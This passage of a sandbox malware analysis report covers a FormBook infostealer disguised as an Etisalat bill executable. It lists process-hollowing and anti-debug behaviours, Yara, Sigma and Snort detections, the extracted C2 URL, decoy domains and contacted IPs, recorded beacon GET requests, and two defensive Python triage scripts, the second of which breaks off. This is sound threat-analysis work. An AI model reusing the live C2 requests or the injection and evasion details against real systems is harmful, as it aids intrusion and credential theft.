
Windows Analysis Report
Details of Your Etisalat Summary Bill for the Month of May 2024.exe

Overview

General Information

Sample name: Details of Your Etisalat Summary Bill for the Month of May 2024.exe
Analysis ID: 1448570
MD5: aa15c6bc55041b534268e0a07c5f0abc
SHA1: 0b73953d2ea38ba9e4a996f96eb4426da818b854
SHA256: 87f7f23776e3b70ce5a9f4095028edf855402cee27433be2b7d65c513cf25235
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: CMSTP Execution Process Creation
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Details of Your Etisalat Summary Bill for the Month of May 2024.exe (PID: 5772 cmdline: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe" MD5: AA15C6BC55041B534268E0A07C5F0ABC)
    • svchost.exe (PID: 4428 cmdline: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • cmstp.exe (PID: 1472 cmdline: "C:\Windows\SysWOW64\cmstp.exe" MD5: D7AABFAB5BEFD53BA3A27BD48F3CC675)
          • cmd.exe (PID: 6476 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.1wxir.com/da29/"], "decoy": ["kas-travel.com", "hy1618.net", "biosrch.com", "sharvellestudio.com", "56416.ooo", "953700958.com", "500051.com", "clic.coach", "veriosg.xyz", "aptsafety.com", "cucinaconestilo.com", "sercettopper.com", "diycoldplungetub.com", "hostingopinion.com", "mediatechnologysolutions.com", "nodogwifnohat.com", "ethpiee.com", "tragaperrasbares.com", "bbbcf.top", "jtxu6.top", "sorgulama95.shop", "myconc.pro", "okb-ar.net", "thanhdoanacademy.com", "rlyadventures.com", "maestrolipari.com", "digitaluxsolution.com", "zituahmed.com", "h5yfdgtg.top", "whalesnorkelingmirissa.online", "indxriim-firsaxtllari.com", "fopoliswhlvtjv.top", "iransarafan.com", "usedata.monster", "mnasjdqw66775jqwe09qwjsqwx.vip", "aphropay.com", "myfreedomlyfe.com", "vytennow.com", "micheleditrana.com", "babycarrot.fun", "maltepede.site", "618dfyy21.com", "flickzbiz.fun", "sshihi.top", "xsports108.com", "ideiastransformadoras.com", "aerotyneholdings.com", "expandyourbusinessdigital.com", "crown777login.com", "wheepexpress.com", "openshiftstore.com", "xzdkzsaczp.xyz", "cycmedb.com", "9sh3j02g8j.com", "cemeku.sydney", "functionalfossils.com", "kenguru.ink", "classicsty.com", "directadz.com", "scuffedwrapz.com", "oxmoz.art", "rusticstores.com", "vietcadao.com", "ai-infinite.net"]}
Yara matches in memory dumps (source dump, rule, description, author; matched strings are listed under each rule):

Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
  [34 entries in total; the remaining entries are not included in this excerpt]
Yara matches in unpacked PE files (source, rule, description, author; matched strings are listed under each rule):

Source: 2.2.svchost.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook | Description: Yara detected FormBook | Author: Joe Security
  Rule: JoeSecurity_FormBook_1 | Description: Yara detected FormBook | Author: Joe Security
  Rule: Windows_Trojan_Formbook_1112e116 | Description: unknown | Author: unknown
    • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Rule: Formbook_1 | Description: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook | Description: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
    • 0x17a39:$sqlite3step: 68 34 1C 7B E1
    • 0x17b4c:$sqlite3step: 68 34 1C 7B E1
    • 0x17a68:$sqlite3text: 68 38 2A 90 C5
    • 0x17b8d:$sqlite3text: 68 38 2A 90 C5
    • 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
  [15 entries in total; the remaining entries are not included in this excerpt]

          System Summary

Source: Process started | Author: Nik Seetharaman | Data: Command: /c del "C:\Windows\SysWOW64\svchost.exe", CommandLine: /c del "C:\Windows\SysWOW64\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\cmstp.exe", ParentImage: C:\Windows\SysWOW64\cmstp.exe, ParentProcessId: 1472, ParentProcessName: cmstp.exe, ProcessCommandLine: /c del "C:\Windows\SysWOW64\svchost.exe", ProcessId: 6476, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", CommandLine: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", ParentImage: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe, ParentProcessId: 5772, ParentProcessName: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", ProcessId: 4428, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", CommandLine: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", ParentImage: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe, ParentProcessId: 5772, ParentProcessName: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, ProcessCommandLine: "C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe", ProcessId: 4428, ProcessName: svchost.exe
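The process chain recorded above (the sample, a svchost.exe whose command line still names the sample, explorer.exe, cmstp.exe, and a cmd.exe that deletes the hollowed svchost.exe path) can be caught from process-creation telemetry alone, without any Yara or network signature. The script below is an added example and is not part of the Joe Sandbox report: its EVENTS list is constructed from the process tree and the Sigma evidence on this page, the record schema (pid, image, cmdline, parent_image) is an assumed simplification of a Sysmon or 4688 event, and the svchost.exe parent allowlist is deliberately minimal.

```python
"""Process-tree triage for the hollowing / LOLBin chain shown in this report.

Added example, not part of the Joe Sandbox report. EVENTS is constructed from
the report's process tree and Sigma evidence; the record schema (pid, image,
cmdline, parent_image) is an assumed simplification of a process-creation event.
"""
import re

SAMPLE = (r"C:\Users\user\Desktop\Details of Your Etisalat Summary Bill "
          r"for the Month of May 2024.exe")

EVENTS = [
    {"pid": 5772, "image": SAMPLE, "cmdline": f'"{SAMPLE}"',
     "parent_image": None},  # the sample's own parent is not shown in the report
    {"pid": 4428, "image": r"C:\Windows\SysWOW64\svchost.exe",
     "cmdline": f'"{SAMPLE}"', "parent_image": SAMPLE},
    {"pid": 1028, "image": r"C:\Windows\Explorer.EXE",
     "cmdline": r"C:\Windows\Explorer.EXE",
     "parent_image": r"C:\Windows\SysWOW64\svchost.exe"},  # as drawn in the report's tree
    {"pid": 1472, "image": r"C:\Windows\SysWOW64\cmstp.exe",
     "cmdline": r'"C:\Windows\SysWOW64\cmstp.exe"',
     "parent_image": r"C:\Windows\Explorer.EXE"},
    {"pid": 6476, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'/c del "C:\Windows\SysWOW64\svchost.exe"',
     "parent_image": r"C:\Windows\SysWOW64\cmstp.exe"},
    {"pid": 2716, "image": r"C:\Windows\system32\conhost.exe",
     "cmdline": r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1",
     "parent_image": r"C:\Windows\SysWOW64\cmd.exe"},
]

# Assumed minimal allowlist; a production rule carries a longer one.
SVCHOST_PARENTS = {"services.exe"}


def basename(path):
    """Lower-cased final path component; '' for a missing path."""
    return path.rsplit("\\", 1)[-1].lower() if path else ""


def first_token(cmdline):
    """First argv element of a Windows command line (quoted or bare)."""
    s = cmdline.lstrip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(" ", 1)[0]


def findings_for(ev):
    img, parent = basename(ev["image"]), basename(ev["parent_image"])
    out = []
    # 1. Hollowing artefact: the image on disk is svchost.exe but the command
    #    line the parent supplied names the original sample. Also trips on a
    #    cmd.exe started with only an argument string ("/c ..."), which is
    #    itself worth a look.
    tok = basename(first_token(ev["cmdline"]))
    if tok != img:
        out.append(f"command line names {tok!r} but image is {img!r}")
    # 2. svchost.exe whose parent is not the service control manager.
    if img == "svchost.exe" and parent not in SVCHOST_PARENTS:
        out.append(f"svchost.exe started by uncommon parent {parent!r}")
    # 3. cmstp.exe (a LOLBin) spawning any child at all.
    if parent == "cmstp.exe":
        out.append(f"{img} spawned by cmstp.exe")
    # 4. cmd.exe deleting a file under the Windows directory.
    if img == "cmd.exe" and re.search(r"\bdel\b.*c:\\windows\\", ev["cmdline"], re.I):
        out.append("cmd.exe deleting a binary under C:\\Windows")
    return out


def triage(events):
    """Map pid -> list of findings, omitting processes with none."""
    return {ev["pid"]: f for ev in events if (f := findings_for(ev))}


if __name__ == "__main__":
    for pid, notes in triage(EVENTS).items():
        for note in notes:
            print(pid, note)
```

Run against the constructed events, only PIDs 4428 (svchost.exe) and 6476 (cmd.exe) produce findings; the sample, explorer.exe, cmstp.exe itself and conhost.exe look normal on these four checks, which is why the cmstp.exe child-process rule and the svchost.exe parent rule are the load-bearing detections here.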
Snort IDS alerts (SID 2031412, protocol TCP, classtype: A Network Trojan was detected), in chronological order:
  05/28/24-15:08:47.165398  source port 49710 -> destination port 80
  05/28/24-15:09:06.832730  source port 49711 -> destination port 80
  05/28/24-15:09:27.255123  source port 49712 -> destination port 80
  05/28/24-15:10:29.038585  source port 49714 -> destination port 80
  05/28/24-15:11:10.766263  source port 49715 -> destination port 80
  05/28/24-15:12:15.071010  source port 49716 -> destination port 80


          AV Detection

Source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp | Malware Configuration Extractor: FormBook (C2 list and decoy domains as given in the configuration above)
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | ReversingLabs: Detection: 36%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.Details of Your Etisalat Summary Bill for the Month of May 2024.exe.15f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.4435483177.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1977959282.00000000015F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4436014928.0000000004AC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2040525225.0000000000850000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2040267539.00000000001D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4435949458.0000000004A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2040356604.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Joe Sandbox ML: detected
Source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: cmstp.pdbGCTL | source: svchost.exe, 00000002.00000002.2040771294.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2038761767.0000000002A1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2039335418.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4435336797.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1976844124.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1975898601.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2041143443.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1977047495.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2041143443.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1980836270.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436345612.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2042686999.0000000004B4C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436345612.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2040176721.0000000004991000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1976844124.0000000003F40000.00000004.00001000.00020000.00000000.sdmp, Details of Your Etisalat Summary Bill for the Month of May 2024.exe, 00000000.00000003.1975898601.00000000040E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2041143443.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1977047495.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2041143443.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1980836270.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000004.00000002.4436345612.0000000004D00000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2042686999.0000000004B4C000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436345612.0000000004E9E000.00000040.00001000.00020000.00000000.sdmp, cmstp.exe, 00000004.00000003.2040176721.0000000004991000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmstp.pdb | source: svchost.exe, 00000002.00000002.2040771294.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000002.00000003.2038761767.0000000002A1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2039335418.0000000002A2F000.00000004.00000020.00020000.00000000.sdmp, cmstp.exe, cmstp.exe, 00000004.00000002.4435336797.0000000000AD0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdb | source: explorer.exe, 00000003.00000002.4443581289.00000000110AF000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436826766.000000000524F000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4435700225.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdbUGP | source: explorer.exe, 00000003.00000002.4443581289.00000000110AF000.00000004.80000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4436826766.000000000524F000.00000004.10000000.00040000.00000000.sdmp, cmstp.exe, 00000004.00000002.4435700225.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BC4696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00BC4696
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BCC9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00BCC9C7
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BCC93C FindFirstFileW,FindClose,0_2_00BCC93C
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BCF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BCF200
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BCF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00BCF35D
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BCF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BCF65E
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BC3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BC3A2B
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BC3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00BC3D4E
Source: C:\Users\user\Desktop\Details of Your Etisalat Summary Bill for the Month of May 2024.exe | Code function: 0_2_00BCBF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00BCBF27
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00ADB3C4 memset,GetPrivateProfileStringW,FindFirstFileW,memset,FindNextFileW,4_2_00ADB3C4
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4_2_00AD894B memset,memset,memset,SHGetFolderPathW,memset,SHGetFolderPathW,CmFree,memset,FindFirstFileW,GetLastError,memset,memset,FindNextFileW,FindClose,4_2_00AD894B

          Networking

Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49710 -> 103.224.212.212:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49711 -> 76.223.105.230:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49712 -> 13.248.169.48:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49714 -> 169.239.128.46:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49715 -> 45.137.159.230:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49716 -> 155.248.232.116:80
Source: C:\Windows\explorer.exe | Network Connect: 103.224.212.212 80
Source: Malware configuration extractor | URLs: www.1wxir.com/da29/
Source: global traffic | HTTP traffic detected: GET /da29/?6l=Q7am8il/nsWle9qVrlpo40N7hUEpDQa8XY45vE38HJwrUpInQsvntdacZL4kVj7U+7+N&2dqhl=R2MlVxP8ert HTTP/1.1 | Host: www.vietcadao.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /da29/?2dqhl=R2MlVxP8ert&6l=6/Esq9Rm48kCgFtfi/klaXziz5v2BYMU9Gqu5IdnDsAA8ndWs6SyEuImZhHevj0yCJMb HTTP/1.1 | Host: www.micheleditrana.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /da29/?6l=zMkbXlAjBAhUzX2IHy11bPpbi+JoISa3f3VK09dwhIavwNJbYx88ATU2pMBs24q8oQzA&2dqhl=R2MlVxP8ert HTTP/1.1 | Host: www.aerotyneholdings.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /da29/?2dqhl=R2MlVxP8ert&6l=R0vht/u//GQkKJnhnDzhccCvBPqy5ItmLDFelNY6QmkspbEKZfPP+/bGeDfLPfj4cOFx HTTP/1.1 | Host: www.1wxir.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /da29/?2dqhl=R2MlVxP8ert&6l=IK1SFyt5vgXTEdWXyzXhj/+ddmg0nYKJwLobMWZqnGcsuxwYcVM7IV3LfBY9TbKtfD67 HTTP/1.1 | Host: www.myconc.pro | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
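The five check-ins above share one campaign path (/da29/) and one constant parameter (2dqhl=R2MlVxP8ert) while rotating the Host header through www.vietcadao.com, www.micheleditrana.com, www.aerotyneholdings.com, www.1wxir.com and www.myconc.pro. Only www.1wxir.com appears in the extracted C2 list; the other four are in the decoy list, so a detection keyed on hostnames alone would chase decoys. The script below is an added example, not part of the Joe Sandbox report: it pivots on request shape instead of hostname, groups the check-ins by (path, constant token), and then uses the extracted C2 to separate the real beacon from decoy traffic. REQUESTS is constructed from the five GET lines on this page (the seven NUL bytes shown as Data Raw are left out), C2 copies the extracted configuration, and the shape thresholds in is_formbook_like() are this example's own assumptions.

```python
"""Pivot on FormBook check-in structure across the decoy-domain rotation.

Added example, not part of the Joe Sandbox report. REQUESTS is constructed
from the five GET requests recorded on this page; C2 copies the extracted
configuration. The shape thresholds in is_formbook_like() are assumptions.
"""
import re
from collections import defaultdict

REQUESTS = [
    "GET /da29/?6l=Q7am8il/nsWle9qVrlpo40N7hUEpDQa8XY45vE38HJwrUpInQsvntdacZL4kVj7U+7+N&2dqhl=R2MlVxP8ert HTTP/1.1\r\n"
    "Host: www.vietcadao.com\r\nConnection: close\r\n\r\n",
    "GET /da29/?2dqhl=R2MlVxP8ert&6l=6/Esq9Rm48kCgFtfi/klaXziz5v2BYMU9Gqu5IdnDsAA8ndWs6SyEuImZhHevj0yCJMb HTTP/1.1\r\n"
    "Host: www.micheleditrana.com\r\nConnection: close\r\n\r\n",
    "GET /da29/?6l=zMkbXlAjBAhUzX2IHy11bPpbi+JoISa3f3VK09dwhIavwNJbYx88ATU2pMBs24q8oQzA&2dqhl=R2MlVxP8ert HTTP/1.1\r\n"
    "Host: www.aerotyneholdings.com\r\nConnection: close\r\n\r\n",
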